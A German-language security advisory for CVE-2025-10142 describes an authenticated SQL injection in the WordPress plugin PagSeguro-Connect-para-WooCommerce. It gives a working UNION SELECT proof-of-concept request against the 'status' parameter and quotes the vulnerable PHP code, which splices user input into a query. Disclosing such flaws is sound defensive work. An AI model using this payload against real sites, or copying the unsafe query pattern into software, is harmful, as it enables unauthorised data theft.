
Offenlegung für CVE-2025-10142
Offenlegung für CVE-2025-10142
Dieses Repository legt eine Schwachstelle offen, die in PagSeguro-Connect-para-WooCommerce <= 4.44.3, einem WordPress-Plugin von Ricardo Martins, entdeckt wurde.
| CVE ID | Art | Komponente | Auswirkung |
|---|
| CVE-2025-10142 | Authentifizierte (Shop Manager+) SQL-Injection | src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.php | Ein authentifizierter Angreifer kann Daten exfiltrieren |
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -
Der Status-Parameter wird direkt in eine SQL-Abfrage eingefügt, ohne Escaping oder Verwendung von $wpdb->prepare().
if (!empty($_REQUEST['status'])) {
$status = sanitize_text_field(wp_unslash($_REQUEST['status']));
$where .= " AND status = '$status'";
}
$this->items = $wpdb->get_results(
$wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY $orderby $order LIMIT %d OFFSET %d",
$per_page,
($current_page - 1) * $per_page
),
ARRAY_A
);
...
Da der Angriff vom ShopManager aus möglich ist, ist die Bedrohung ziemlich gering. Es war etwas mühsam, dem Prozess zu folgen, bei dem die externe Eingabe in $where eingefügt und dieses $where dann direkt in die SQL-Syntax eingebaut wird.
Name: MooseLove
Rolle: Unabhängiger Sicherheitsforscher / Bug-Hunter
Kontakt: Auf Anfrage erhältlich
Dieses Advisory wird zur öffentlichen Sensibilisierung für Sicherheit bereitgestellt. Bei Namensnennung frei teilbar.